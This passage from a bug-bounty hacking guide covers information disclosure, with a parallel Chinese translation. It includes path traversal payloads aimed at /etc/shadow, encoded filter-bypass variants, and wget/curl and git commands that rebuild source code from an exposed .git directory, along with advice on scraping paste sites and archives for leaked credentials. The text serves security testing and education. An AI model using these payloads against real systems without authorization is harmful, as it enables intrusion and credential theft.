- The Guide to Finding and Reporting Web Vulnerabilities
- About the Author
- About the Tech Reviewer
- Foreword
- Introduction
- Who This Book Is For
- What Is In This Book
- Happy Hacking!
- 1 Picking a Bug Bounty Program
- 2 Sustaining Your Success
- 3 How the Internet Works
- 4 Environmental Setup and Traffic Interception
- 5 Web Hacking Reconnaissance
- 6 Cross-Site Scripting
- 7 Open Redirects
- 8 Clickjacking
- 9 Cross-Site Request Forgery
- 10 Insecure Direct Object References
- 11 SQL Injection
- 12 Race Conditions
- 13 Server-Side Request Forgery
- 14 Insecure Deserialization
- 15 XML External Entity
- 16 Template Injection
- 17 Application Logic Errors and Broken Access Control
- 18 Remote Code Execution
- 19 Same-Origin Policy Vulnerabilities
- 20 Single-Sign-On Security Issues
- 21 Information Disclosure
- 22 Conducting Code Reviews
- 23 Hacking Android Apps
- 24 API Hacking
- 25 Automatic Vulnerability Discovery Using Fuzzers
Hunting for Information Disclosure
You can use several strategies to find information disclosure vulnerabilities, depending on the application you’re targeting and what you’re looking for. A good starting point is to look for software version numbers and configuration information by using the recon techniques introduced in Chapter 5 . Then you can start to look for exposed configuration files, database files, and other sensitive files uploaded to the production server that aren’t protected. The following steps discuss some techniques you can attempt.
您可以使用多种策略来查找信息披露漏洞,具体取决于您的目标应用程序和您正在寻找的内容。一个好的起点是通过使用第 5 章中介绍的侦察技术来查找软件版本号和配置信息。然后,您可以开始寻找未受保护的暴露的配置文件、数据库文件和其他敏感文件上传到生产服务器上。以下步骤讨论您可以尝试的一些技巧。
Step 1: Attempt a Path Traversal Attack
Start by trying a path traversal attack to read the server’s sensitive files. Path traversal attacks are used to access files outside the web application’s root folder. This process involves manipulating filepath variables the application uses to reference files by adding the ../
characters to them. This sequence refers to the parent directory of the current directory in Unix systems, so by adding it to a filepath, you can often reach files outside the web root.
尝试路径遍历攻击来读取服务器的敏感文件。路径遍历攻击用于访问网站应用程序根文件夹之外的文件。此过程涉及操作应用程序用于引用文件的文件路径变量,通过向其中添加 ../ 字符来实现。在 Unix 系统中这个序列代表当前目录的父目录,因此通过在文件路径中添加它,通常可以访问网站根目录之外的文件。
For example, let’s say a website allows you to load an image in the application’s image folder by using a relative URL. An absolute URL contains an entire address, from the URL protocol to the domain name and pathnames of the resource. Relative URLs, on the other hand, contain only a part of the full URL. Most contain only the path or filename of the resource. Relative URLs are used to link to another location on the same domain.
例如,假设一个网站允许您使用相对 URL 将图片加载到应用程序的图片文件夹中。绝对 URL 包含整个地址,从 URL 协议到域名和资源的路径名。相对 URL,则仅包含完整 URL 的一部分。大多数仅包含资源的路径或文件名。相对 URL 用于链接到同一域上的另一个位置。
This URL, for example, will redirect users to https://example.com/images/1.png :
例如,此 URL 将重定向用户到 https://example.com/images/1.png:
https://example.com/image?url=/images/1.png
In this case, the url
parameter contains a relative URL ( /images/1.png ) that references files within the web application root. You can insert the ../
sequence to try to navigate out of the images folder and out of the web root. For instance, the following URL refers to the index.html file at the web application’s root folder (and out of the images folder):
在这种情况下,URL 参数包含一个相对 URL(/images/1.png),它引用了 Web 应用程序根目录中的文件。您可以插入../序列尝试导航出图像文件夹并从 Web 根导航出来。例如,以下 URL 引用 Web 应用程序根文件夹(并退出图像文件夹)中的 index.html 文件:
https://example.com/image?url=/images/../index.html
Similarly, this one will access the /etc/shadow file at the server’s root directory, which is a file that stores a list of the system’s user accounts and their encrypted passwords:
类似地,这个程序将访问位于服务器根目录下的 /etc/shadow 文件,该文件存储了系统用户账户及其加密密码的列表。
https://example.com/image?url=/images/../../../../../../../etc/shadow
It might take some trial and error to determine how many ../
sequences you need to reach the system’s root directory. Also, if the application implements some sort of input validation and doesn’t allow ../
in the filepath, you can use encoded variations of ../
, such as %2e%2e%2f
(URL encoding), %252e%252e%255f
(double URL encoding), and ..%2f
(partial URL encoding).
确定需要多少../序列才能到达系统的根目录可能需要一些尝试和错误。此外,如果应用程序实现了某种输入验证并且不允许在文件路径中使用../,您可以使用编码的../变体,例如%2e%2e%2f(URL 编码),%252e%252e%255f(双重 URL 编码)和..%2f(部分 URL 编码)。
Step 2: Search the Wayback Machine
Another way to find exposed files is by using the Wayback Machine. Introduced in Chapter 5 , the Wayback Machine is an online archive of what websites looked like at various points in time. You can use it to find hidden and deprecated endpoints, as well as large numbers of current endpoints without actively crawling the site, making it a good first look into what the application might be exposing.
另一种查找暴露文件的方法是使用 Wayback Machine。Wayback Machine 是一个在线网站归档,可以让你查看网站在不同时间点的外观。你可以使用它来查找隐藏和弃用的端点,以及大量当前端点,而不必主动遍历网站,因此是一个很好的第一步,了解应用程序可能暴露的内容。
On the Wayback Machine’s site, simply search for a domain to see its past versions. To search for a domain’s files, visit https://web.archive.org/web/*/DOMAIN .
在 Wayback Machine 的网站上,只需搜索域名即可查看其过去的版本。要搜索域名的文件,请访问 https://web.archive.org/web/*/DOMAIN。
Add a /*
to this URL to get the archived URLs related to the domain as a list. For example, https://web.archive.org/web/*/example.com/* will return a list of URLs related to example.com . You should see the URLs displayed on the Wayback Machine web page ( Figure 21-1 ).
在 URL 末尾添加 /*,以获得与该域名相关的归档 URL 列表。例如,https://web.archive.org/web/*/example.com/* 将返回与 example.com 相关的 URL 列表。您应该可以在 Wayback Machine 网页上看到显示的 URL(图 21-1)。
You can then use the search function to see whether any sensitive pages have been archived. For example, to look for admin pages, search for the term /admin in the found URLs ( Figure 21-2 ).
然后您可以使用搜索功能查看是否已存档任何敏感页面。例如,要查找管理页面,请在找到的 URL 中搜索"/admin"一词(图 21-2)。
You can also search for backup files and configuration files by using common file extensions like .conf ( Figure 21-3 ) and .env , or look for source code, like JavaScript or PHP files, by using the file extensions .js and .php .
您也可以通过使用常见的文件扩展名,例如.conf(见图 21-3)和.env 搜索备份文件和配置文件,或通过使用文件扩展名.js 和.php 查找源代码,如 JavaScript 或 PHP 文件。
Download interesting archived pages and look for any sensitive info. For example, are there any hardcoded credentials that are still in use, or does the page leak any hidden endpoints that normal users shouldn’t know about?
下载有趣的归档页面,查找任何敏感信息。例如,是否存在仍在使用的硬编码凭据,或者页面是否泄漏了正常用户不应该知道的隐藏端点?
Step 3: Search Paste Dump Sites
Next, look into paste dump sites like Pastebin and GitHub gists. These let users share text documents via a direct link rather than via email or services like Google Docs, so developers often use them to send source code, configuration files, and log files to their coworkers. But on a site like Pastebin, for example, shared text files are public by default. If developers upload a sensitive file, everyone will be able to read it. For this reason, these code-sharing sites are pretty infamous for leaking credentials like API keys and passwords.
下一步,查看类似 Pastebin 和 GitHub gist 的粘贴转储站点。这些允许用户通过直接链接共享文本文档,而不是通过电子邮件或像 Google Docs 这样的服务,因此开发人员经常使用它们向同事发送源代码、配置文件和日志文件。但是,在像 Pastebin 这样的网站上,共享的文本文件默认情况下是公开的。如果开发人员上传敏感文件,每个人都可以阅读它。因此,这些代码共享站点因泄漏 API 密钥和密码等凭据而相当臭名昭著。
Pastebin has an API that allows users to search for public paste files by using a keyword, email, or domain name. You can use this API to find sensitive files that belong to a certain organization. Tools like PasteHunter or pastebin-scraper can also automate the process. Pastebin-scraper ( https://github.com/streaak/pastebin-scraper/ ) uses the Pastebin API to help you search for paste files. This tool is a shell script, so download it to a local directory and run the following command to search for public paste files associated with a particular keyword. The -g
option indicates a general keyword search:
Pastebin 有一个 API,允许用户使用关键词、电子邮件或域名搜索公共粘贴文件。您可以使用此 API 来查找属于某个组织的敏感文件。像 PasteHunter 或 pastebin-scraper 这样的工具也可以自动化这个过程。Pastebin-scraper (https://github.com/streaak/pastebin-scraper/) 使用 Pastebin API 来帮助您搜索粘贴文件。这个工具是一个 shell 脚本,因此请将其下载到本地目录并运行以下命令来搜索与特定关键词相关的公共粘贴文件。-g 选项表示常规关键词搜索:
./scrape.sh -g KEYWORD
This command will return a list of Pastebin file IDs associated with the specified KEYWORD . You can access the returned paste files by going to pastebin.com/ID .
此命令将返回与指定关键字相关联的 Pastebin 文件 ID 列表。您可以通过前往 pastebin.com/ID 来访问返回的粘贴文件。
Step 4: Reconstruct Source Code from an Exposed .git Directory
Another way of finding sensitive files is to reconstruct source code from an exposed .git directory. When attacking an application, obtaining its source code can be extremely helpful for constructing an exploit. This is because some bugs, like SQL injections, are way easier to find through static code analysis than black-box testing. Chapter 22 covers how to review code for vulnerabilities.
另一种发现敏感文件的方法是从公开的.git 目录中重构源代码。在攻击应用程序时,获取其源代码对于构建攻击非常有帮助。这是因为某些漏洞,比如 SQL 注入,通过静态代码分析比黑盒测试容易找到。第 22 章介绍了如何查找漏洞的代码审查方法。
When a developer uses Git to version-control a project’s source code, Git will store all of the project’s version-control information, including the commit history of project files, in a Git directory. Normally, this .git folder shouldn’t be accessible to the public, but sometimes it’s accidentally made available. This is when information leaks happen. When a .git directory is exposed, attackers can obtain an application’s source code and therefore gain access to developer comments, hardcoded API keys, and other sensitive data via secret scanning tools like truffleHog ( https://github.com/dxa4481/truffleHog/ ) or Gitleaks ( https://github.com/zricethezav/gitleaks/ ).
当开发人员使用 Git 对项目的源代码进行版本控制时,Git 将存储所有项目版本控制信息,包括项目文件的提交历史记录在一个 Git 目录中。通常情况下,这个.git 文件夹不应该对公众可访问,但有时它会被意外地暴露。这是信息泄漏发生的时候。当.git 目录暴露时,攻击者可以获取应用程序的源代码,并因此通过类似 truffleHog(https://github.com/dxa4481/truffleHog/) 或 Gitleaks(https://github.com/zricethezav/gitleaks/) 的秘密扫描工具获得开发人员的注释,硬编码的 API 密钥和其他敏感数据。
Checking Whether a .git Folder Is Public
To check whether an application’s .git folder is public, simply go to the application’s root directory (for example, example.com ) and add /.git to the URL:
要检查一个应用程序的 .git 文件夹是否公开,只需进入应用程序的根目录(例如,example.com),并在 URL 后面添加 /.git:
https://example.com/.git
Three things could happen when you browse to the /.git directory. If you get a 404 error, this means the application’s .git directory isn’t made available to the public, and you won’t be able to leak information this way. If you get a 403 error, the .git directory is available on the server, but you won’t be able to directly access the folder’s root, and therefore won’t be able to list all the files contained in the directory. If you don’t get an error and the server responds with the directory listing of the .git directory, you can directly browse the folder’s contents and retrieve any information contained in it.
当你浏览/.git 目录时有三种可能性。如果你获得 404 错误,这意味着应用程序的.git 目录没有对公众开放,因此你将无法通过此方式泄露信息。如果你获得 403 错误,.git 目录在服务器上是可以访问的,但你将无法直接访问该文件夹的根目录,因此无法列出目录中包含的所有文件。如果你没有收到错误,并且服务器响应了.git 目录的目录列表,则可以直接浏览文件夹的内容并检索其包含的任何信息。
Downloading Files
If directory listing is enabled, you can browse through the files and retrieve the leaked information. The wget
command retrieves content from web servers. You can use wget
in recursive mode ( -r
) to mass-download all files stored within the specified directory and its subdirectories:
如果启用目录列表,您可以浏览文件并检索泄露的信息。 Wget 命令从 Web 服务器检索内容。 您可以在递归模式(-r)中使用 wget 以批量下载指定目录及其子目录中存储的所有文件:
$ wget -r example.com/.git
But if directory listing isn’t enabled and the directory’s files are not shown, you can still reconstruct the entire .git directory. First, you’ll need to confirm that the folder’s contents are indeed available to the public. You can do this by trying to access the directory’s config file:
但是,如果目录列表未启用且目录文件未显示,则仍可以重建整个.git 目录。首先,您需要确认该文件夹的内容确实对公众开放。您可以通过尝试访问目录的配置文件来实现此目的:
$ curl https://example.com/.git/config
If this file is accessible, you might be able to download the Git directory’s entire contents so long as you understand the general structure of .git directories. A .git directory is laid out in a specific way. When you execute the following command in a Git repository, you should see contents resembling the following:
如果可以访问此文件,只要您理解.git 目录的一般结构,就可以下载 Git 目录的全部内容。.git 目录有特定的排列方式。在 Git 存储库中执行以下命令时,您应该会看到类似以下内容的内容:
$ ls .git
COMMIT_EDITMSG HEAD branches config description hooks index info logs objects refs
The output shown here lists a few standard files and folders that are important for reconstructing the project’s source. In particular, the /objects directory is used to store Git objects. This directory contains additional folders; each has two character names corresponding to the first two characters of the SHA1 hash of the Git objects stored in it. Within these subdirectories, you’ll find files named after the rest of the SHA1 hash of the Git object stored in it. In other words, the Git object with a hash of 0a082f2656a655c8b0a87956c7bcdc93dfda23f8
will be stored with the filename of 082f2656a655c8b0a87956c7bcdc93dfda23f8 in the directory .git/objects/0a . For example, the following command will return a list of folders:
这里显示的输出列出了一些重建项目源的重要标准文件和文件夹。 特别是/objects 目录用于存储 Git 对象。 该目录包含其他文件夹; 每个文件夹都有两个字符的名称,对应于其中存储的 Git 对象的 SHA1 哈希的前两个字符。 在这些子目录中,您将找到以其余 SHA1 哈希命名的文件,这些文件存储在其中的 Git 对象。 换句话说,具有哈希值 0a082f2656a655c8b0a87956c7bcdc93dfda23f8 的 Git 对象将使用文件名 082f2656a655c8b0a87956c7bcdc93dfda23f8 存储在目录.git / objects / 0a 中。 例如,以下命令将返回文件夹列表:
$ ls .git/objects
00 0a 14 5a 64 6e 82 8c 96 a0 aa b4 be c8 d2 dc e6 f0 fa info pack
And this command will reveal the Git objects stored in a particular folder:
这个命令将显示在特定文件夹中存储的 Git 对象。
$ ls .git/objects/0a
082f2656a655c8b0a87956c7bcdc93dfda23f8 4a1ee2f3a3d406411a72e1bea63507560092bd 66452433322af3d319a377415a890c70bbd263 8c20ea4482c6d2b0c9cdaf73d4b05c2c8c44e9 ee44c60c73c5a622bb1733338d3fa964b333f0
0ec99d617a7b78c5466daa1e6317cbd8ee07cc 52113e4f248648117bc4511da04dd4634e6753 72e6850ef963c6aeee4121d38cf9de773865d8
Git stores different types of objects in . git/objects : commits, trees, blobs, and annotated tags. You can determine an object’s type by using this command:
Git 将不同类型的对象存储在.git/objects 中:提交、树、blob 和注释标签。您可以使用此命令确定对象的类型:
$ git cat-file -t OBJECT-HASH
Commit objects store information such as the commit’s tree object hash, parent commit, author, committer, date, and message of a commit. Tree objects contain the directory listings for commits. Blob objects contain copies of files that were committed (read: actual source code!). Finally, tag objects contain information about tagged objects and their associated tag names. You can display the file associated with a Git object by using the following command:
提交对象储存提交的树对象哈希,父提交、作者、提交者、日期以及提交信息等信息。树对象包含提交的目录清单。Blob 对象包含已提交的文件的副本(也就是源代码!)。最后,标签对象包含有关已标记的对象及其相关标签名称的信息。您可以使用以下命令显示与 Git 对象关联的文件:
$ git cat-file -p OBJECT-HASH
The /config file is the Git configuration file for the project, and the /HEAD file contains a reference to the current branch:
/config 文件是该项目的 Git 配置文件,/HEAD 文件包含对当前分支的引用:
$ cat .git/HEAD
ref: refs/heads/master
If you can’t access the /.git folder’s directory listing, you have to download each file you want instead of recursively downloading from the directory root. But how do you find out which files on the server are available when object files have complex paths, such as .git/objects/0a/72e6850ef963c6aeee4121d38cf9de773865d8 ?
如果您无法访问/.git 文件夹的目录列表,您必须下载想要的每个文件,而不是从目录根递归下载。但是,当对象文件具有复杂路径时,例如.git/objects/0a/72e6850ef963c6aeee4121d38cf9de773865d8,您如何找出服务器上可用的文件?
You start with filepaths that you already know exist, like .git/HEAD ! Reading this file will give you a reference to the current branch (for example, .git/refs/heads/master ) that you can use to find more files on the system:
你可以从已知的文件路径开始,比如.git/HEAD!读取这个文件可以给你一个当前分支的引用(例如.git/refs/heads/master),你可以使用它来在系统中找到更多的文件:
$ cat .git/HEAD
ref: refs/heads/master
$ cat .git/refs/heads/master
0a66452433322af3d319a377415a890c70bbd263
$ git cat-file -t 0a66452433322af3d319a377415a890c70bbd263
commit
$ git cat-file -p 0a66452433322af3d319a377415a890c70bbd263
tree 0a72e6850ef963c6aeee4121d38cf9de773865d8
The .git/refs/heads/master file will point you to the particular object hash that stores the directory tree of the commit. From there, you can see that the object is a commit and is associated with a tree object, 0a72e6850ef963c6aeee4121d38cf9de773865d8
. Now examine that tree object:
.git/refs/heads/master 文件将指向存储提交目录树的特定对象哈希。从那里,你可以看到该对象是一个提交,并与树对象 0a72e6850ef963c6aeee4121d38cf9de773865d8 关联。现在检查那个树对象:
$ git cat-file -p 0a72e6850ef963c6aeee4121d38cf9de773865d8
100644 blob 6ad5fb6b9a351a77c396b5f1163cc3b0abcde895 .gitignore
040000 blob 4b66088945aab8b967da07ddd8d3cf8c47a3f53c source.py
040000 blob 9a3227dca45b3977423bb1296bbc312316c2aa0d README
040000 tree 3b1127d12ee43977423bb1296b8900a316c2ee32 resources
Bingo! You discover some source code files and additional object trees to explore.
万岁!您找到了一些源代码文件和其他要探索的对象树。
On a remote server, your requests to discover the different files would look a little different. For instance, you can use this URL to determine the HEAD:
在远程服务器上,您查找不同文件的请求会有所不同。例如,您可以使用以下网址确定 HEAD:
https://example.com/.git/HEAD
Use this URL to find the object stored in that HEAD:
使用此网址查找存储在该 HEAD 中的对象:
https://example.com/.git/refs/heads/master
Use this URL to access the tree associated with the commit:
使用此 URL 访问与提交相关的树:
https://example.com/.git/objects/0a/72e6850ef963c6aeee4121d38cf9de773865d8
Finally, use this URL to download the source code stored in the source.py file:
最后,使用该 URL 下载存储在 source.py 文件中的源代码:
https://example.com/.git/objects/4b/66088945aab8b967da07ddd8d3cf8c47a3f53c
If you are downloading files from a remote server, you’ll also need to decompress the downloaded object file before you read it. This can be done using some code. You can decompress the object file by using Ruby, Python, or your preferred language’s zlib library:
如果你从远程服务器下载文件,你还需要在读取之前解压下载的对象文件。这可以使用一些代码来完成。你可以使用 Ruby、Python 或你喜欢的语言的 zlib 库来解压对象文件。
ruby -rzlib -e 'print Zlib::Inflate.new.inflate(STDIN.read)' < OBJECT_FILE
python -c 'import zlib, sys;
print repr(zlib.decompress(sys.stdin.read()))' < OBJECT_FILE
After recovering the project’s source code, you can grep
for sensitive data such as hardcoded credentials, encryption keys, and developer comments. If you have time, you can browse through the entire recovered codebase to conduct a source code review and find potential vulnerabilities.
在恢复项目源代码后,您可以使用 grep 查找敏感数据,例如硬编码凭据、加密密钥和开发人员的注释。 如果有时间,您可以浏览整个恢复的代码库进行源代码审核,并查找潜在漏洞。
Step 5: Find Information in Public Files
You could also try to find information leaks in the application’s public files, such as their HTML and JavaScript source code. In my experience, JavaScript files are a rich source of information leaks!
你也可以尝试在应用程序的公共文件中寻找信息泄露,例如 HTML 和 JavaScript 源代码。根据我的经验,JavaScript 文件是信息泄露的丰富来源!
Browse the web application that you’re targeting as a regular user and take note of where the application displays or uses your personal information. Then right-click those pages and click View page source . You should see the HTML source code of the current page. Follow the links on this page to find other HTML files and JavaScript files the application is using. Then, on the HTML file and the JavaScript files found, grep
every page for hardcoded credentials, API keys, and personal information with keywords like password
and api_key
.
浏览您所针对的 Web 应用程序,以普通用户的身份,并注意应用程序显示或使用个人信息的位置。然后右键单击这些页面,点击“查看页面源代码”。您应该看到当前页面的 HTML 源代码。跟随此页上的链接以查找应用程序正在使用的其他 HTML 文件和 JavaScript 文件。然后,在找到的 HTML 文件和 JavaScript 文件上,使用密码和 api_key 等关键字对每个页面进行硬编码凭据,API 密钥和个人信息的 grep。
You can also locate JavaScript files on a site by using tools like LinkFinder ( https://github.com/GerbenJavado/LinkFinder/ ).
您还可以使用 LinkFinder 等工具在网站上找到 JavaScript 文件。
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论